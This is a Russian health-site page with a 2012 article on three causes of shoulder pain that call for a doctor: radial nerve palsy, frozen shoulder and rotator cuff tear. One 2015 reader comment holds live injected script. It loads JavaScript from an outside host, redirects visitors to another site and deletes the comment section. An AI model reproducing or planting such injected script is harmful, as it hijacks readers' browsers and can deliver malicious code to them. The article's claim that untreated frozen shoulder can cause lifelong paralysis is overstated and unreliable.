Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Три причины для похода к ...  >>  Три причины для похода к врачу из-за боли в плече
 
Обратная связь
 

Три причины для похода к врачу из-за боли в плече

Размер шрифта
07 февраля 2012 07:00
  • google_analytics: false
  • Нравится

Когда с визитом к врачу лучше не затягивать.

1 

  1. Деформация кисти, также известная как «паралич субботнего вечера» - расстройство, вызываемое параличом лучевого нерва, в результате которого мышцы, разгибающие пальцы и запястье, ослабевают и кисть начинает «свисать».

Ключевой симптом паралича лучевого нерва – невозможность шевельнуть запястьем руки, лежащей ладонью вниз.

Название «паралич субботнего вечера» это расстройство получило из-за того, что подобный синдром зачастую возникает у злоупотребляющих алкоголем людей, засыпающих, опираясь на руку.

Исследование скорости проводимости нерва помогает подтвердить, что именно лучевой нерв стал источником проблемы.

При малейшем подозрении на проблему с лучевым нервом необходимо немедленно проконсультироваться с врачом.

  1. Адгезивный капсулит или «замороженное» плечо. Капсулит представляет собой диффузное поражение капсулы и синовиальной оболочки плечевого сустава, нередко приводящее к длительной инвалидизации пациента.

Причиной являются нейротрофические нарушения в капсуле и синовиальной оболочке сустава, приводящие к специфичным морфологическим изменениям – фиброзу и значительному уменьшению объема полости сустава.

Синовиальная оболочка – внутренний слой суставной сумки или костно-фиброзного канала. Она богата нервами и сосудами, которые обеспечивают обмен веществ в полости сустава.

Основные признаки

  • Сильная боль и тугоподвижность в плечевом суставе.
  • Возникает спонтанно.
  • Особенно затруднено вращение руки внутрь.

В результате воспаления снижается подвижность в суставе. Без лечения может привести к пожизненному параличу.

Существуют разные способы лечения капсулита плечевого сустава, но курса консервативной терапии с постепенной разработкой плечевого сустава обычно достаточно для выздоровления.

  1. Самое частое повреждение плеча отнюдь не перелом и не вывих, как считается. Это разрыв вращательной «манжетки» плеча. Под вращательной «манжеткой» плеча понимают передненаружную часть плечевого сустава, в которую вплетены сухожилия мышц, окружающих сустав. В норме этот комплекс мышц и сухожилий отвечает за все движения плеча.

Травматические разрывы происходят при резком напряжении мышц во время падения на локоть, вытянутую руку, иногда при прямом ударе в область плечевого сустава.

Пациенты жалуются на боли в плече. Чаще всего боль возникает в области прикрепления дельтовидной мышцы на верхне-боковой поверхности плеча. Движения в суставе становятся ограниченными, пациент не может свободно поднять выпрямленную руку.

Больного просят отвести кпереди до горизонтального уровня руку, занимающую среднее положение между супинацией и пронацией. Затем просят согнуть руку в локтевом суставе до 90°. В этом положении предплечье не удерживается и падает в медиальную сторону.

Лечение

При полном разрыве – только операция. Чем раньше она будет сделана, тем больше вероятность полного восстановления движений.

При обычном рентгене повреждения может быть не видно. Поэтому, если у вас сохраняются вышеперечисленные симптомы после травмы, даже в отсутствии перелома- необходимо пройти более детальное обследование.

 

Сюжеты по теме:
Три признака проблем в плече для похода к врачу 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:57

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.